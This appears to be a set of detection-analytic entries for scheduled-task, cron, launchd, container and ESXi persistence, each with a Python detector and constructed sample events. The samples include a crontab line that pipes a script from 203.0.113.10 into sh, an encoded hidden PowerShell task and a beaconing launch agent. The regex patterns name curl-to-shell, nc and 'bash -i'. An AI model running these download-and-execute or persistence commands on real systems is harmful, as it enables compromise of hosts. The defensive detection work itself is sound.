Detects creation or modification of scheduled tasks via schtasks.exe, at.exe, or the Task Scheduler COM interface (ITaskService), followed by execution of an outlier process tied to the registered task. Security events 4698 (task created) and 4702 (task updated) carry the full task XML in the TaskContent field, including the Exec Command and Arguments, but only when the "Audit Other Object Access Events" subcategory is enabled; the Microsoft-Windows-TaskScheduler/Operational log (106 task registered, 200/201 action started/completed) is the fallback where it is not. COM-based registration never spawns schtasks.exe, so the analytic should key on the 4698/4702 event rather than on a schtasks command line. Actions started by the Schedule service run as children of the svchost.exe instance hosting it, which is the pivot for correlating the later Sysmon process creation.
| Data Component | Name | Channel |
|---|---|---|
| Scheduled Job Creation (DC0001) | WinEventLog:Security | EventCode=4698 |
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| File Modification (DC0061) | WinEventLog:Sysmon | EventCode=11 (FileCreate; the task XML is written or overwritten under C:\Windows\System32\Tasks\). Sysmon has no file-modification event, and EventCode=2 records only creation-time changes |
| Field | Description |
|---|---|
| TaskAuthor | Unexpected user or account context initiating the task. |
| CommandLineRegex | Suspicious binaries or script usage tied to scheduled tasks. |
| ExecutionWindow | Lookback window to correlate process execution after task registration. |
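The correlation described above, written out as an added Python example (it is not an analytic from the original page or from any vendor). It assumes the 4698 and Sysmon EventCode=1 events have already been parsed into dicts using the schema field names, with timestamps normalised to Sysmon's text form; EXPECTED_TASK_AUTHORS, the command-line regex and the 15-minute window are placeholder values for the three mutable elements, and the sample events are constructed:

```python
import re
import ntpath
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

# Namespace of the Task Scheduler XML carried in the 4698/4702 TaskContent field.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Mutable elements from the table above; the values are assumptions for this example
# (EXPECTED_TASK_AUTHORS in particular must come from the environment).
EXPECTED_TASK_AUTHORS = {r"NT AUTHORITY\SYSTEM", r"CORP\svc-patching"}
COMMANDLINE_REGEX = re.compile(
    r"\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32|certutil|bitsadmin)(\.exe)?\b"
    r".*(\s-enc(odedcommand)?\s|\s-e\s|downloadstring|\biex\b|https?://|\\users\\public\\|\\appdata\\|\\temp\\)",
    re.IGNORECASE)
EXECUTION_WINDOW = timedelta(minutes=15)
# Task actions are launched by the Schedule service, which runs inside this svchost.exe.
SCHEDULE_HOST = r"c:\windows\system32\svchost.exe"


def parse_ts(s):
    """Timestamps are assumed pre-normalised to Sysmon's 'YYYY-MM-DD HH:MM:SS.fff' form."""
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def exe_name(action):
    """Lower-cased basename of the executable in an action string (quoted paths allowed)."""
    m = re.match(r'"([^"]+)"|(\S+)', action)
    return ntpath.basename(m.group(1) or m.group(2)).lower() if m else ""


def task_actions(task_content):
    """Each <Exec> action of the TaskContent XML as a 'command arguments' string."""
    # The event text opens with a UTF-16 XML declaration; drop it so the str parses.
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", task_content))
    actions = []
    for ex in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = ex.findtext("t:Command", default="", namespaces=TASK_NS).strip()
        args = ex.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        actions.append(f"{cmd} {args}".strip())
    return actions


def correlate(task_events, process_events, window=EXECUTION_WINDOW):
    """Score each registration against TaskAuthor and CommandLineRegex, then look for a
    Schedule-service child running one of its actions inside ExecutionWindow; only an
    outlier task that actually executed becomes an alert."""
    alerts = []
    for task in task_events:
        author = f'{task["SubjectDomainName"]}\\{task["SubjectUserName"]}'
        actions = task_actions(task["TaskContent"])
        reasons = []
        if author not in EXPECTED_TASK_AUTHORS:
            reasons.append(f"TaskAuthor {author} is not an expected account")
        for action in actions:
            if COMMANDLINE_REGEX.search(action):
                reasons.append(f"CommandLineRegex hit in TaskContent: {action}")
        registered = parse_ts(task["TimeCreated"])
        exes = {exe_name(a) for a in actions}
        executed = []
        for proc in process_events:
            started = parse_ts(proc["UtcTime"])
            if (registered <= started <= registered + window
                    and proc["ParentImage"].lower() == SCHEDULE_HOST
                    and ntpath.basename(proc["Image"]).lower() in exes):
                delay = int((started - registered).total_seconds())
                executed.append(f"executed {delay}s after registration: {proc['CommandLine']}")
                if COMMANDLINE_REGEX.search(proc["CommandLine"]):
                    reasons.append("CommandLineRegex hit on the launched process")
        if executed and reasons:
            alerts.append({"TaskName": task["TaskName"], "reasons": reasons + executed})
    return alerts


def task_xml(command, arguments):
    """Minimal TaskContent body of the shape 4698 carries, for the constructed samples."""
    return (f'<?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="{TASK_NS["t"]}">'
            f"<Actions><Exec><Command>{command}</Command><Arguments>{arguments}</Arguments>"
            "</Exec></Actions></Task>")


# Constructed sample events (not captured from a real host); field names follow the
# Security 4698 and Sysmon EventCode=1 schemas, with timestamps already normalised.
SAMPLE_TASKS = [
    {"TimeCreated": "2024-05-01 08:00:00.000", "SubjectDomainName": "NT AUTHORITY", "SubjectUserName": "SYSTEM",
     "TaskName": r"\Microsoft\Windows\Servicing\StartComponentCleanup",
     "TaskContent": task_xml(r"%SystemRoot%\System32\Dism.exe", "/online /Cleanup-Image /StartComponentCleanup")},
    {"TimeCreated": "2024-05-01 08:00:30.000", "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",
     "TaskName": r"\Microsoft\Windows\Updater",
     "TaskContent": task_xml("powershell.exe", "-NoP -W Hidden -Enc QQBCAEMA")},
]
SAMPLE_PROCESSES = [
    {"UtcTime": "2024-05-01 08:00:05.000", "Image": r"C:\Windows\System32\Dism.exe",
     "CommandLine": "Dism.exe /online /Cleanup-Image /StartComponentCleanup",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"UtcTime": "2024-05-01 08:05:32.000", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc QQBCAEMA",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "User": r"CORP\jdoe"},
]
```

Running correlate(SAMPLE_TASKS, SAMPLE_PROCESSES) returns one alert for the jdoe task and none for the SYSTEM servicing task, even though both executed inside the window. The ParentImage check is what keeps the correlation honest: a matching binary spawned by explorer.exe in the same window is not the scheduled execution, and a task whose action never ran is left as a lower-priority registration event rather than an alert.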
Detects creation or modification of cron jobs via crontab(1), the /etc/crontab and /etc/cron.* files, the per-user spool (/var/spool/cron/crontabs on Debian-derived systems, /var/spool/cron on RHEL-derived ones), or systemd timer units, with execution by unusual users or at non-standard intervals. The write and rename syscalls only appear in auditd if file-watch rules (-w path -p wa) cover those paths, and crontab(1) writes the spool through a setuid/setgid helper, so the user and parent process that invoked crontab, not the cron daemon, carry the attribution. A timer unit needs a matching .service unit and a systemctl enable/start to take effect, so the .timer file write and the systemctl execution are both observ able.
| Data Component | Name | Channel |
|---|---|---|
| File Modification (DC0061) | auditd:SYSCALL | write, rename |
| Process Creation (DC0032) | auditd:SYSCALL | execve |
| Scheduled Job Creation (DC0001) | linux:osquery | crontab, systemd_units (filtered to id LIKE '%.timer') |
| Field | Description |
|---|---|
| CronSchedulePattern | Look for high-frequency or off-hour scheduling patterns. |
| ServiceUser | Unusual users scheduling jobs (e.g., www-data, nobody). |
| BinaryEntropy | High-entropy (packed or obfuscated) scripts or binaries referenced by the scheduled job. |
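A scoring pass over crontab content and systemd timer units for the three mutable elements above, added here as a Python example rather than the page's own detection; it is meant to run on the file content (or on osquery's crontab and systemd_units rows) once auditd or osquery has reported a change. The thresholds, the unusual-user set and the command regex are assumptions to tune, the timer parser covers only a small subset of systemd's calendar grammar and returns None for anything else, and the sample crontab is constructed:

```python
import re
# Mutable elements from the table above; thresholds and sets are assumptions to tune per environment.
MAX_RUNS_PER_DAY = 48          # more often than every 30 min counts as high-frequency
OFF_HOURS = set(range(0, 6))   # 00:00-05:59
UNUSUAL_USERS = {"www-data", "nobody", "apache", "nginx", "mysql", "postgres"}
SUSPICIOUS_COMMAND = re.compile(
    r"/tmp/|/dev/shm/|/var/tmp/|\b(curl|wget)\b.*\|\s*(ba)?sh\b|base64\s+(-d|--decode)|\bnc\b|bash\s+-i")
# Approximate daily runs implied by the cron shorthands (@reboot is event driven, so 0).
SPECIALS = {"@reboot": 0, "@yearly": 0.003, "@annually": 0.003, "@monthly": 0.033,
            "@weekly": 0.14, "@daily": 1, "@midnight": 1, "@hourly": 24}
TIMER_DIRECTIVE = re.compile(r"^\s*(OnCalendar|OnUnitActiveSec)\s*=\s*(\S.*?)\s*$", re.M)
CALENDAR_WORDS = {"minutely": 1440, "hourly": 24, "daily": 1, "weekly": 0.14}
SECONDS = {"": 1, "s": 1, "sec": 1, "m": 60, "min": 60, "h": 3600, "hour": 3600}


def expand_field(field, lo, hi):
    """Expand one cron field ('*', lists, ranges, '/step') into its set of values."""
    values = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step = part.split("/", 1)
            step = int(step)
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
            start, end = (int(x) for x in part.split("-", 1))
        else:
            start = int(part)
            end = hi if step > 1 else start   # 'N/step' means N..hi every step
        values.update(range(start, end + 1, step))
    return values


def runs_per_day(minute, hour):
    """Upper bound on daily runs from the minute and hour fields alone."""
    return len(expand_field(minute, 0, 59)) * len(expand_field(hour, 0, 23))


def analyze_crontab(text, owner=None):
    """Score job lines; owner=None means the system format with a user column, else a per-user crontab."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
            continue  # blank, comment or environment assignment
        if line.startswith("@"):
            head, tail = (line.split(None, 1) + [""])[:2]
            runs, hours = SPECIALS.get(head, 0), set()
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue  # not a well-formed job line
            runs, hours, tail = runs_per_day(fields[0], fields[1]), expand_field(fields[1], 0, 23), fields[5]
        if owner:
            user, command = owner, tail
        elif len(pair := tail.split(None, 1)) == 2:
            user, command = pair
        else:
            continue
        reasons = []
        if runs > MAX_RUNS_PER_DAY:
            reasons.append(f"high-frequency schedule (~{runs} runs/day)")
        if hours and hours <= OFF_HOURS:
            reasons.append("runs only during off-hours")
        if user in UNUSUAL_USERS:
            reasons.append(f"unusual scheduling user: {user}")
        if SUSPICIOUS_COMMAND.search(command):
            reasons.append("suspicious command content")
        if reasons:
            findings.append({"line": lineno, "user": user, "command": command, "reasons": reasons})
    return findings


def timer_runs_per_day(unit_text):
    """Approximate daily runs of a .timer; unparsed expressions return None for manual review."""
    runs = None
    for key, value in TIMER_DIRECTIVE.findall(unit_text):
        if key == "OnUnitActiveSec":                      # e.g. 30min, 2h, 900 (seconds)
            m = re.fullmatch(r"(\d+)\s*([a-z]*)", value)
            if m and m.group(2) in SECONDS:
                runs = 86400 // (int(m.group(1)) * SECONDS[m.group(2)])
        elif value in CALENDAR_WORDS:
            runs = CALENDAR_WORDS[value]
        elif (m := re.fullmatch(r"(?:\*-\*-\*\s+)?\*:0/(\d+)(?::00)?", value)):   # every N minutes
            runs = 1440 // int(m.group(1))
        elif re.fullmatch(r"(?:\*-\*-\*\s+)?\d{1,2}:\d{2}(?::\d{2})?", value):     # fixed daily time
            runs = 1
    return runs


# Constructed sample /etc/crontab (not taken from a real host).
SAMPLE_ETC_CRONTAB = """\
SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/2 *   * * *   www-data /bin/bash -c 'curl -s http://203.0.113.10/u.sh | sh'
0 3     * * *   nobody  /dev/shm/.x/sync
"""
```

analyze_crontab(SAMPLE_ETC_CRONTAB) flags the two non-root lines and leaves the distribution's run-parts entries alone; pass owner="www-data" for the per-user spool, where there is no user column. runs_per_day deliberately ignores the day-of-month, month and weekday fields, so it is an upper bound, which is the right direction for a high-frequency check.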
Detects creation or alteration of LaunchAgents or LaunchDaemons: a property list written to /Library/LaunchAgents, /Library/LaunchDaemons, or a user's ~/Library/LaunchAgents, followed by execution of the binary named in its Program or ProgramArguments key. The plist alone survives reboots; launchctl load or bootstrap (or the next login for agents, the next boot for daemons) activates it. StartInterval, StartCalendarInterval, RunAtLoad and KeepAlive define the JobRunInterval, and by convention the Label matches the plist filename, so a mismatch is itself worth a look.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | macos:unifiedlog | process launch |
| File Creation (DC0039) | fs:fsusage | disk activity on /Library/LaunchAgents or LaunchDaemons |
| Scheduled Job Creation (DC0001) | macos:osquery | launchd |
| Field | Description |
|---|---|
| PlistLabel | Labels not associated with known applications or vendors. |
| LaunchPath | Executable path outside of standard directories (/usr/bin, /Applications). |
| JobRunInterval | Unexpected periodic job intervals (e.g., every minute). |
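Plist inspection for the three mutable elements above, as an added Python example (not code from the page, from Apple or from osquery). It takes the raw bytes of the written plist; the label allowlist, the standard-directory list, the interpreter list, the 300-second interval threshold, the extra check that a com.apple label outside /System/Library is unusual, and both sample plists are assumptions constructed for the example:

```python
import os
import plistlib

# Mutable elements from the table above. The label allowlist, directory list and
# interval threshold are assumptions for this example; tune them per fleet.
KNOWN_LABEL_PREFIXES = ("com.apple.", "com.corp.")
STANDARD_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/libexec/",
                 "/System/", "/Library/Apple/", "/Applications/")
INTERPRETERS = ("/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript",
                "/usr/bin/python3", "/usr/bin/perl")
MIN_RUN_INTERVAL = 300   # seconds; a StartInterval below this is "every minute"-class


def job_program(job):
    """launchd runs Program if set, otherwise ProgramArguments[0]."""
    if job.get("Program"):
        return job["Program"]
    args = job.get("ProgramArguments") or []
    return args[0] if args else ""


def analyze_launchd_plist(path, data):
    """Reasons the job plist at `path` (raw file bytes) is an outlier for PlistLabel,
    LaunchPath and JobRunInterval; an empty list means it passed every check."""
    job = plistlib.loads(data)
    reasons = []
    label = job.get("Label", "")
    if not label.startswith(KNOWN_LABEL_PREFIXES):
        reasons.append(f"PlistLabel {label!r} not associated with a known vendor")
    elif label.startswith("com.apple.") and not path.startswith("/System/Library/"):
        reasons.append("com.apple label outside /System/Library (rare; verify the code signature)")
    if label and os.path.basename(path) != f"{label}.plist":
        reasons.append("plist filename does not match its Label")
    program = job_program(job)
    if not program.startswith(STANDARD_DIRS):
        reasons.append(f"LaunchPath outside standard directories: {program}")
    if program in INTERPRETERS:
        reasons.append(f"job launches an interpreter ({program}); inspect ProgramArguments")
        payload = " ".join(job.get("ProgramArguments", [])[1:])
        for token in ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/", "curl ", "base64"):
            if token in payload:
                reasons.append(f"ProgramArguments reference {token.strip()}")
                break
    interval = job.get("StartInterval")
    if isinstance(interval, int) and interval < MIN_RUN_INTERVAL:
        reasons.append(f"JobRunInterval of {interval}s is unusually frequent")
    if job.get("RunAtLoad") and job.get("KeepAlive"):
        reasons.append("RunAtLoad with KeepAlive (relaunched whenever it exits)")
    return reasons


def scan(plist_files):
    """Analyze (path, bytes) pairs and return only the plists that produced reasons."""
    results = {}
    for path, data in plist_files:
        reasons = analyze_launchd_plist(path, data)
        if reasons:
            results[path] = reasons
    return results


PLIST_HEADER = (b'<?xml version="1.0" encoding="UTF-8"?>\n<!DOCTYPE plist PUBLIC '
                b'"-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n'
                b'<plist version="1.0">')
# Constructed sample plists (not taken from a real host).
BENIGN_PLIST = PLIST_HEADER + b"""<dict>
  <key>Label</key><string>com.corp.inventory</string>
  <key>Program</key><string>/Applications/Inventory.app/Contents/MacOS/inventory</string>
  <key>StartInterval</key><integer>3600</integer>
  <key>RunAtLoad</key><true/>
</dict></plist>"""
SUSPICIOUS_PLIST = PLIST_HEADER + b"""<dict>
  <key>Label</key><string>com.apple.updater</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>/Users/jdoe/Library/.cache/updater --beacon</string>
  </array>
  <key>StartInterval</key><integer>60</integer>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""
SAMPLE_FILES = [("/Library/LaunchDaemons/com.corp.inventory.plist", BENIGN_PLIST),
                ("/Library/LaunchAgents/com.apple.updater.plist", SUSPICIOUS_PLIST)]
```

scan(SAMPLE_FILES) reports only the second plist. Note why the LaunchPath check alone would have missed it: /bin/sh is a standard path, so the interpreter branch has to look past ProgramArguments[0] to find the payload living under /Users; a job that hides behind a system interpreter is the common shape, not the exception.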
Detects unusual use of cron or shell sleep loops inside containers to execute unfamiliar scripts or binaries repeatedly. Most base images ship without a running cron daemon, so a crond process, a new /etc/cron.* entry, or a while-true loop with sleep in an entrypoint is itself notable, as is any binary executing from /tmp, /dev/shm, or a mounted volume rather than from the image's own layers.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | auditd:SYSCALL | execve |
| File Modification (DC0061) | containerd:runtime | file change monitoring within /etc/cron.*, /tmp, or mounted volumes |
| Field | Description |
|---|---|
| ContainerLabel | Labels or tags indicating dev/test containers executing scheduled tasks. |
| ScriptFrequency | Repetitive invocation pattern within short container lifespan. |
| ImageSource | Unexpected container image sources creating cron entries. |
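The ScriptFrequency check above, as an added Python example that is not drawn from the page or from any runtime vendor. It assumes execve events already enriched with the container id, image reference and labels, as a runtime-security pipeline with container metadata (Falco, Tetragon, or auditd joined against the runtime's container list) would supply; the thresholds, the trusted-registry prefix, the dev/test label values and the sample events are constructed assumptions:

```python
from collections import defaultdict
from statistics import mean, pstdev

# Mutable elements from the table above; the values are assumptions for this example.
MIN_REPEATS = 4                 # same binary executed at least this often in one container
MAX_JITTER = 0.25               # relative spread of inter-exec gaps; lower means timer-like
TRUSTED_REGISTRIES = ("registry.corp.example/",)
DEV_TEST_ENVS = {"dev", "test", "staging"}
WRITABLE_PREFIXES = ("/tmp/", "/dev/shm/", "/var/tmp/", "/mnt/", "/data/")
LOOP_HELPERS = {"/bin/sleep", "/usr/bin/sleep"}   # the loop's own delay, not the payload


def find_repetitive_execs(events, min_repeats=MIN_REPEATS, max_jitter=MAX_JITTER):
    """Group execve events by (container, executable) and report binaries that recur at a
    regular interval (a cron or sleep loop) together with ImageSource/ContainerLabel context.
    Each event: ts (epoch seconds), container_id, image, labels (dict), exe, argv."""
    by_key = defaultdict(list)
    for e in events:
        if e["exe"] not in LOOP_HELPERS:
            by_key[(e["container_id"], e["exe"])].append(e)
    findings = []
    for (cid, exe), runs in by_key.items():
        if len(runs) < min_repeats:
            continue
        times = sorted(e["ts"] for e in runs)
        gaps = [b - a for a, b in zip(times, times[1:])]
        period = mean(gaps)
        if period <= 0 or pstdev(gaps) / period > max_jitter:
            continue  # repeated but irregular: request-driven work, not a schedule
        first = runs[0]
        reasons = [f"ScriptFrequency: {len(runs)} runs of {exe} every ~{period:.0f}s "
                   f"within a {times[-1] - times[0]:.0f}s window"]
        if exe.startswith(WRITABLE_PREFIXES):
            reasons.append("binary runs from a writable or mounted path, not the image layers")
        if not first["image"].startswith(TRUSTED_REGISTRIES):
            reasons.append(f"ImageSource {first['image']} is not a trusted registry")
        env = first.get("labels", {}).get("env")
        if env in DEV_TEST_ENVS:
            reasons.append(f"ContainerLabel env={env} container performing scheduled work")
        findings.append({"container_id": cid, "exe": exe, "period_s": round(period), "reasons": reasons})
    return findings


def make_event(ts, cid, image, env, exe, argv):
    """Build one enriched execve event in the shape find_repetitive_execs expects."""
    return {"ts": ts, "container_id": cid, "image": image, "labels": {"env": env}, "exe": exe, "argv": argv}


# Constructed sample execve events (not captured from a real cluster).
SAMPLE_EVENTS = (
    # test container whose entrypoint loops "while true; do /tmp/.cache/worker; sleep 60; done"
    [make_event(t, "c1a2", "docker.io/library/alpine:3.19", "test", "/bin/sleep", ["sleep", "60"])
     for t in (0, 60, 120, 180, 240)]
    + [make_event(t, "c1a2", "docker.io/library/alpine:3.19", "test", "/tmp/.cache/worker", ["worker"])
       for t in (1, 61, 121, 182, 240)]
    # production web container: nginx reloads driven by config pushes, irregular timing
    + [make_event(t, "9f3b", "registry.corp.example/web/nginx:1.25", "prod", "/usr/sbin/nginx", ["nginx", "-s", "reload"])
       for t in (0, 7, 300, 302)]
)
```

find_repetitive_execs(SAMPLE_EVENTS) returns the /tmp/.cache/worker loop in container c1a2 and ignores the nginx reloads, whose inter-exec gaps are too irregular to be a schedule. The jitter test is what separates a timer from a busy service; the sleep binary is excluded so the report names the payload rather than the loop's delay.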
Detects modification of ESXi cron jobs, the /etc/rc.local.d/local.sh startup script, or scheduled API calls used to persist custom binaries or shell scripts. The root crontab lives at /var/spool/cron/crontabs/root and is read by BusyBox crond; actors commonly kill and relaunch crond after editing it, and that restart from an interactive shell is itself a useful signal. Edits to the crontab do not survive a reboot on their own, whereas local.sh is captured by the host's periodic configuration backup and runs at every boot, so durable persistence usually touches local.sh (often to re-create the cron entry), making it the more reliable file to watch.
| Data Component | Name | Channel |
|---|---|---|
| Scheduled Job Creation (DC0001) | esxi:vmkernel | Startup script and task execution logs |
| Command Execution (DC0064) | esxi:hostd | shell access or job registration |
| File Modification (DC0061) | esxi:cron | Edits to /etc/rc.local.d/local.sh or /var/spool/cron/crontabs/root |
| Field | Description |
|---|---|
| StartupScriptName | Filename not matching expected initialization scripts. |
| ExecutionContext | Commands run from unexpected SSH sessions or elevated shells. |
| PersistenceInterval | Uncommon scheduling combinations (e.g., a local.sh boot hook that re-creates an hourly cron entry). |